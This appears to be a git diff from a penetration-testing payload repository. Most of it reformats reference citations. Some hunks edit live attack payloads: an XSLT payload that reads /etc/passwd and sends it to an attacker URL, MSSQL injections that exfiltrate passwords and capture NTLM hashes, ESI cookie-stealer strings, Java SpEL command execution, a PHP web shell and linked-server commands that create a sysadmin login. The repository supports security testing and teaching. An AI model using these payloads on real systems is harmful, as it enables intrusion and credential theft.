+* [Exploiting Spring Boot Actuators - Michael Stepankin - February 25, 2019](https://web.archive.org/web/20250116045001/https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)
 * [Springboot - Official Documentation - May 9, 2024](https://web.archive.org/web/20140725032126/http://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
diff --git a/Insecure Source Code Management/Mercurial.md b/Insecure Source Code Management/Mercurial.md
index c4cda0c793..5b1de0d83e 100644
--- a/Insecure Source Code Management/Mercurial.md	
+++ b/Insecure Source Code Management/Mercurial.md	
@@ -20,4 +20,4 @@
 
 ## References
 
-* [my-chemical-romance - siunam - Feb 13, 2023](https://web.archive.org/web/20250712102012/https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
+* [my-chemical-romance - siunam - February 13, 2023](https://web.archive.org/web/20250712102012/https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md
index 415d2d38ec..fc50d931e2 100644
--- a/Insecure Source Code Management/README.md	
+++ b/Insecure Source Code Management/README.md	
@@ -46,4 +46,4 @@ For example in Git, the exploitation technique doesn't require to list the conte
 
 ## References
 
-* [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
+* [Hidden directories and files as a source of sensitive information about web application - bl4de - April 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md
index 9d228ac051..37129ffbd1 100644
--- a/JSON Web Token/README.md	
+++ b/JSON Web Token/README.md	
@@ -534,7 +534,7 @@ You should create your own key pair for this attack and host it. It should look
 - [JSON Web Token Validation Bypass in Auth0 Authentication API - Ben Knight - April 16, 2020](https://web.archive.org/web/20230104231143/https://insomniasec.com/blog/auth0-jwt-validation-bypass)
 - [JSON Web Token Vulnerabilities - 0xn3va - March 27, 2022](https://web.archive.org/web/20260305090633/https://0xn3va.gitbook.io/cheat-sheets/web-application/json-web-token-vulnerabilities)
 - [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8, 2017](https://web.archive.org/web/20190405023824/https://trustfoundry.net/jwt-hacking-101/)
-- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq - May 3, 2022](https://github.com/dwyl/learn-json-web-tokens)
+- [Learn how to use JSON Web Tokens (JWT) for Authentication - dwyl - May 3, 2022](https://github.com/dwyl/learn-json-web-tokens)
 - [Privilege Escalation like a Boss - janijay007 - October 27, 2018](https://web.archive.org/web/20190723093831/https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
 - [Simple JWT hacking - Hari Prasanth (@b1ack_h00d) - March 7, 2019](https://web.archive.org/web/20200724145838/https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
 - [WebSec CTF - Authorization Token - JWT Challenge - Kris Hunt - August 7, 2016](https://web.archive.org/web/20211025223311/https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
diff --git a/LDAP Injection/README.md b/LDAP Injection/README.md
index acf31d1422..f6debab01b 100644
--- a/LDAP Injection/README.md	
+++ b/LDAP Injection/README.md	
@@ -165,7 +165,7 @@ end
 
 ## References
 
-* [[European Cyber Week] - AdmYSion - Alan Marrec (Maki)](https://www.maki.bzh/writeups/ecw2018admyssion/)
+* [[European Cyber Week] - AdmYSion - Alan Marrec (Maki) - January 14, 2025](https://web.archive.org/web/20250114083154/https://www.maki.bzh/writeups/ecw2018admyssion/)
 * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN - October 31, 2018](https://web.archive.org/web/20200924103615/https://0xukn.fr/posts/writeupecw2018admyssion/)
 * [How To Configure OpenLDAP and Perform Administrative LDAP Tasks - Justin Ellingwood - May 30, 2015](https://web.archive.org/web/20260119175101/https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
 * [How To Manage and Use LDAP Servers with OpenLDAP Utilities - Justin Ellingwood - May 29, 2015](https://web.archive.org/web/20160305121823/https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
diff --git a/Prompt Injection/README.md b/Prompt Injection/README.md
index d5c2c42f0d..ef566dee8e 100644
--- a/Prompt Injection/README.md	
+++ b/Prompt Injection/README.md	
@@ -209,6 +209,6 @@ Examples of Indirect Prompt medium:
 * [Language Models are Few-Shot Learners - Tom B Brown - May 28, 2020](https://web.archive.org/web/20260306044348/https://arxiv.org/abs/2005.14165)
 * [Large Language Model Prompts (RTC0006) - HADESS/RedTeamRecipe - March 26, 2023](http://web.archive.org/web/20230529085349/https://redteamrecipe.com/Large-Language-Model-Prompts/)
 * [LLM Hacker's Handbook - Forces Unseen - March 7, 2023](https://doublespeak.chat/#/handbook)
-* [Prompt Injection Attacks for Dummies - Devansh Batham - Mar 2, 2025](https://web.archive.org/web/20250302143915/https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
+* [Prompt Injection Attacks for Dummies - Devansh Batham - March 2, 2025](https://web.archive.org/web/20250302143915/https://devanshbatham.hashnode.dev/prompt-injection-attacks-for-dummies)
 * [The AI Attack Surface Map v1.0 - Daniel Miessler - May 15, 2023](https://web.archive.org/web/20251212164354/https://danielmiessler.com/blog/the-ai-attack-surface-map-v1-0)
 * [You shall not pass: the spells behind Gandalf - Max Mathys and Václav Volhejn - June 2, 2023](https://web.archive.org/web/20230605141849/https://www.lakera.ai/insights/who-is-gandalf)
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
index 39d048d3a4..f9ad7a9348 100644
--- a/SAML Injection/README.md	
+++ b/SAML Injection/README.md	
@@ -174,7 +174,7 @@ Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_At
           <xsl:template match="doc">
             <xsl:variable name="file" select="unparsed-text('/etc/passwd')"/>
             <xsl:variable name="escaped" select="encode-for-uri($file)"/>
-            <xsl:variable name="attackerUrl" select="'http://attacker.com/'"/>
+            <xsl:variable name="attackerUrl" select="'http://[ATTACKER.DOMAIN.TLD]/'"/>
             <xsl:variable name="exploitUrl"select="concat($attackerUrl,$escaped)"/>
             <xsl:value-of select="unparsed-text($exploitUrl)"/>
           </xsl:template>
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index e07e464bf1..28bc4f3e95 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -304,14 +304,14 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
 * **Permission**: Requires `VIEW SERVER STATE` permission on the server.
 
     ```powershell
-    1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
+    1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.xem',null,null))
     ```
 
 * **Permission**: Requires the `CONTROL SERVER` permission.
 
     ```powershell
-    1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
-    1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
+    1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\',default,default)))
+    1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.[ATTACKER.DOMAIN.TLD]\1.trc',default))
     ```
 
 ### MSSQL UNC Path
@@ -319,21 +319,21 @@ Technique from [@ptswarm](https://twitter.com/ptswarm/status/1313476695295512578
 MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
 
 ```sql
-1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 
+1'; use master; exec xp_dirtree '\\10.10.10.10\SHARE';-- 
 ```
 
 ```sql
-xp_dirtree '\\attackerip\file'
-xp_fileexist '\\attackerip\file'
-BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
-BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
-RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
-RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
-RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
-RESTORE LABELONLY FROM DISK = '\\attackerip\file'
-RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
-RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
+xp_dirtree '\\10.10.10.10\file'
+xp_fileexist '\\10.10.10.10\file'
+BACKUP LOG [TESTING] TO DISK = '\\10.10.10.10\file'
+BACKUP DATABASE [TESTING] TO DISK = '\\10.10.10.10\file'
+RESTORE LOG [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE DATABASE [TESTING] FROM DISK = '\\10.10.10.10\file'
+RESTORE HEADERONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE FILELISTONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE LABELONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE REWINDONLY FROM DISK = '\\10.10.10.10\file'
+RESTORE VERIFYONLY FROM DISK = '\\10.10.10.10\file'
 ```
 
 ## MSSQL Trusted Links
@@ -366,8 +366,8 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
     select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"')
 
     -- Create a SQL user and give sysadmin privileges
-    EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
-    EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMAIN\SERVER1"') AT "DOMAIN\SERVER2"
+    EXECUTE('EXECUTE(''CREATE LOGIN User WITH PASSWORD = ''''Password123'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
+    EXECUTE('EXECUTE(''sp_addsrvrolemember ''''User'''' , ''''sysadmin'''' '') AT "DOMAIN\SQL01"') AT "DOMAIN\SQL02"
     ```
 
 ## MSSQL Privileges
@@ -402,7 +402,7 @@ A trusted link in Microsoft SQL Server is a linked server relationship that allo
 ### MSSQL Make User DBA
 
 ```sql
-EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
+EXEC master.dbo.sp_addsrvrolemember 'User', 'sysadmin';
 ```
 
 ## MSSQL Database Credentials
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index a32331dc81..506991b933 100644
--- a/SQL Injection/MySQL Injection.md	
+++ b/SQL Injection/MySQL Injection.md	
@@ -767,7 +767,7 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
 * [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://web.archive.org/web/20260227032450/https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
 * [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
 * [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://web.archive.org/web/20210215172533/https://sqlwiki.netspi.com/injectionTypes/errorBased/)
-* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
+* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - January 18, 2024](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
 * [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://web.archive.org/web/20260303030701/https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
 * [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://web.archive.org/web/20250807062504/https://www.youtube.com/watch?si=kFQkvCEn2NiWLDGY&v=u91EdO1cDak&feature=youtu.be)
 * [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://web.archive.org/web/20201001181524/https://resources.infosecinstitute.com/sql-truncation-attack/)
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 7612a9f36c..e9b7d4b478 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -592,5 +592,5 @@ Bypass using keywords case insensitive or an equivalent operator.
 * [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](https://web.archive.org/web/20260109024910/https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
 * [SQLi Cheatsheet - NetSparker - March 19, 2022](https://web.archive.org/web/20220219223426/https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
 * [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://web.archive.org/web/20231004093323/https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
-* [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
+* [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - July 31, 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
 * [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://web.archive.org/web/20260302110304/https://www.websec.ca/kb/sql_injection)
diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index fa456048c8..28f2872eb6 100644
--- a/Server Side Include Injection/README.md	
+++ b/Server Side Include Injection/README.md	
@@ -48,12 +48,12 @@ Surrogate-Control: content="ESI/1.0"
 
 | Description             | Payload                                  |
 | ----------------------- | ---------------------------------------- |
-| Blind detection         | `<esi:include src=http://attacker.com>`  |
-| XSS                     | `<esi:include src=http://attacker.com/XSSPAYLOAD.html>` |
-| Cookie stealer          | `<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
+| Blind detection         | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]>`  |
+| XSS                     | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/XSSPAYLOAD.html>` |
+| Cookie stealer          | `<esi:include src=http://[ATTACKER.DOMAIN.TLD]/?cookie_stealer.php?=$(HTTP_COOKIE)>` |
 | Include a file          | `<esi:include src="supersecret.txt">` |
 | Display debug info      | `<esi:debug/>` |
-| Add header              | `<!--esi $add_header('Location','http://attacker.com') -->` |
+| Add header              | `<!--esi $add_header('Location','http://[ATTACKER.DOMAIN.TLD]') -->` |
 | Inline fragment         | `<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>` |
 
 | Software | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
diff --git a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md
index 1c3e331cd3..a1bf35ba24 100644
--- a/Server Side Request Forgery/SSRF-Advanced-Exploitation.md	
+++ b/Server Side Request Forgery/SSRF-Advanced-Exploitation.md	
@@ -120,7 +120,7 @@ The following PHP script can be used to generate a page that will redirect to th
     $commands = array(
             'HELO victim.com',
             'MAIL FROM: <admin@victim.com>',
-            'RCPT To: <hacker@attacker.com>',
+            'RCPT To: <User@[ATTACKER.DOMAIN.TLD]>',
             'DATA',
             'Subject: @hacker!',
             'Hello Friend',
diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md
index cfe8cda1b9..3c011df107 100644
--- a/Server Side Template Injection/Elixir.md	
+++ b/Server Side Template Injection/Elixir.md	
@@ -63,4 +63,4 @@ elem(System.shell("id && sleep 5"), 0) # Time-Based RCE
 
 ## References
 
-- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md
index 043f1f197e..51999f030d 100644
--- a/Server Side Template Injection/Java.md	
+++ b/Server Side Template Injection/Java.md	
@@ -397,7 +397,7 @@ ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().ex
 DNS lookup
 
 ```java
-${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}
+${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","[ATTACKER.DOMAIN.TLD]")}
 ```
 
 ### SpEL - Session Attributes
@@ -413,7 +413,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - Method using `java.lang.Runtime` #1 - accessed with JavaClass
 
     ```java
-    ${T(java.lang.Runtime).getRuntime().exec("COMMAND_HERE")}
+    ${T(java.lang.Runtime).getRuntime().exec("whoami")}
     ```
 
 - Method using `java.lang.Runtime` #2
@@ -427,13 +427,13 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
 - Method using `java.lang.Runtime` #3 - accessed with `invoke`
 
     ```java
-    ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('COMMAND_HERE')}
+    ${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}
     ```
 
 - Method using `java.lang.Runtime` #3 - accessed with `javax.script.ScriptEngineManager`
 
     ```java
-    ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping x.x.x.x\\\")"))}
+    ${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"whoami\\\")"))}
     ```
 
 - Method using `java.lang.ProcessBuilder`
@@ -442,7 +442,7 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
     ${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())}
     ${request.getAttribute("c").add("cmd.exe")}
     ${request.getAttribute("c").add("/k")}
-    ${request.getAttribute("c").add("ping x.x.x.x")}
+    ${request.getAttribute("c").add("whoami")}
     ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
     ${request.getAttribute("a")}
     ```
@@ -509,7 +509,7 @@ Time-Based:
 
 ## References
 
-- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://securitylab.github.com/research/bean-validation-RCE)
+- [Bean Stalking: Growing Java beans into RCE - Alvaro Munoz - July 7, 2020](https://web.archive.org/web/20200707130000/https://securitylab.github.com/research/bean-validation-RCE)
 - [Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - Peter M (@pmnh_) - December 4, 2022](https://web.archive.org/web/20230203103413/https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/)
 - [Expression Language Injection - OWASP - December 4, 2019](https://web.archive.org/web/20200422030628/https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection)
 - [Expression Language injection - PortSwigger - January 27, 2019](https://web.archive.org/web/20251215015718/https://portswigger.net/kb/issues/00100f20_expression-language-injection)
@@ -522,4 +522,4 @@ Time-Based:
 - [Server-Side Template Injection: RCE For The Modern Web App (PDF) - James Kettle (@albinowax) - August 8, 2015](https://web.archive.org/web/20150808084830/https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
 - [Server-Side Template Injection: RCE For The Modern Web App (Video) - James Kettle (@albinowax) - December 28, 2015](https://web.archive.org/web/20200501162014/https://www.youtube.com/watch?v=3cT0uE7Y87s)
 - [VelocityServlet Expression Language injection - MagicBlue - November 15, 2017](https://web.archive.org/web/20220412162651/https://magicbluech.github.io/2017/11/15/VelocityServlet-Expression-language-Injection/)
-- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md
index f37f3b6eb8..654b3f2b34 100644
--- a/Server Side Template Injection/JavaScript.md	
+++ b/Server Side Template Injection/JavaScript.md	
@@ -169,4 +169,4 @@ ${= _.VERSION}
 
 - [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/)
 - [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://web.archive.org/web/20260207143828/https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
-- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
index 7b9c0a9238..a9e92ca152 100644
--- a/Server Side Template Injection/PHP.md	
+++ b/Server Side Template Injection/PHP.md	
@@ -342,5 +342,5 @@ layout template:
 ## References
 
 - [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
-- [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
-- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Server Side Template Injection (SSTI) via Twig escape handler - Grav - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md
index 4bd5b28efc..8085d90bad 100644
--- a/Server Side Template Injection/Python.md	
+++ b/Server Side Template Injection/Python.md	
@@ -463,4 +463,4 @@ Reference and explanation of payload can be found [yeswehack/server-side-templat
 - [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - Brumens - March 24, 2025](https://web.archive.org/web/20240906203847/https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
 - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://web.archive.org/web/20210826203322/https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
 - [The minefield between syntaxes: exploiting syntax confusions in the wild - Brumens - October 17, 2025](https://web.archive.org/web/20251006113218/https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
-- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index a1b493a792..66e48a0e21 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -220,7 +220,7 @@ Once the template engine is identified, the attacker injects more complex expres
 
 - [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://web.archive.org/web/20160311193057/https://portswigger.net/knowledgebase/papers/ServerSideTemplateInjection.pdf)
 - [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://web.archive.org/web/20231210014226/https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
-- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
 - [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://web.archive.org/web/20260111213449/https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
 - [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://web.archive.org/web/20180928123607/https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
 - [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://web.archive.org/web/20251104003639/https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
diff --git a/Server Side Template Injection/Ruby.md b/Server Side Template Injection/Ruby.md
index 1d742f416d..2a99d9aa4f 100644
--- a/Server Side Template Injection/Ruby.md	
+++ b/Server Side Template Injection/Ruby.md	
@@ -88,4 +88,4 @@ Execute code using SSTI for **Slim** engine.
 ## References
 
 - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
-- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 3, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md
index faa39dc78a..c8c86e45e5 100644
--- a/Upload Insecure Files/README.md	
+++ b/Upload Insecure Files/README.md	
@@ -162,7 +162,7 @@ PHP web shells don't always have the `<?php` tag, here are some alternatives:
 * The `<?=` is shorthand syntax in PHP for outputting values. It is equivalent to using `<?php echo`.
 
     ```php
-    <?=`$_GET[0]`?>
+    <?=`id`?>
     ```
 
 ### Filename Vulnerabilities
@@ -244,11 +244,11 @@ Example of a malicious `uwsgi.ini` file:
 ; read from a symbol
 foo = @(sym://uwsgi_funny_function)
 ; read from binary appended data
-bar = @(data://[REDACTED])
+bar = @(data://[ATTACKER.DOMAIN.TLD])
 ; read from http
-test = @(http://[REDACTED])
+test = @(http://[ATTACKER.DOMAIN.TLD])
 ; read from a file descriptor
-content = @(fd://[REDACTED])
+content = @(fd://[ATTACKER.DOMAIN.TLD])
 ; read from a process stdout
 body = @(exec://whoami)
 ; call a function returning a char *
@@ -392,22 +392,22 @@ More payloads in the folder `CVE FFmpeg HLS/`.
 
 ## References
 
-* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella - 28 Feb 2023](https://web.archive.org/web/20230228140105/https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
+* [A New Vector For “Dirty” Arbitrary File Write to RCE - Maxence Schmitt and Lorenzo Stella - February 28, 2023](https://web.archive.org/web/20230228140105/https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
 * [Analysis of Python's .pth files as a persistence mechanism - @malmoeb - January 14, 2025](https://web.archive.org/web/20250218083206/https://dfir.ch/posts/publish_python_pth_extension/)
-* [Arbitrary File Upload Tricks In Java - pyn3rd - 2022-05-07](https://web.archive.org/web/20220601101409/https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
+* [Arbitrary File Upload Tricks In Java - pyn3rd - May 7, 2022](https://web.archive.org/web/20220601101409/https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
 * [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](https://web.archive.org/web/20200203171034/https://www.justanotherhacker.com:80/2011/05/htaccess-based-attacks.html)
 * [BookFresh Tricky File Upload Bypass to RCE - Ahmed Aboul-Ela - November 29, 2014](http://web.archive.org/web/20141231210005/https://secgeek.net/bookfresh-vulnerability/)
 * [Bulletproof Jpegs Generator - Damien Cauquil (@virtualabs) - April 9, 2012](https://web.archive.org/web/20130606125954/http://www.virtualabs.fr/Nasty-bulletproof-Jpegs-l)
-* [Encoding Web Shells in PNG IDAT chunks - phil - 04-06-2012](https://web.archive.org/web/20120610205435/http://www.idontplaydarts.com:80/2012/06/encoding-web-shells-in-png-idat-chunks)
-* [File Upload - HackTricks - 20/7/2024](https://web.archive.org/web/20241230150546/https://book.hacktricks.xyz/pentesting-web/file-upload)
+* [Encoding Web Shells in PNG IDAT chunks - phil - April 6, 2012](https://web.archive.org/web/20120610205435/http://www.idontplaydarts.com:80/2012/06/encoding-web-shells-in-png-idat-chunks)
+* [File Upload - HackTricks - July 20, 2024](https://web.archive.org/web/20241230150546/https://book.hacktricks.xyz/pentesting-web/file-upload)
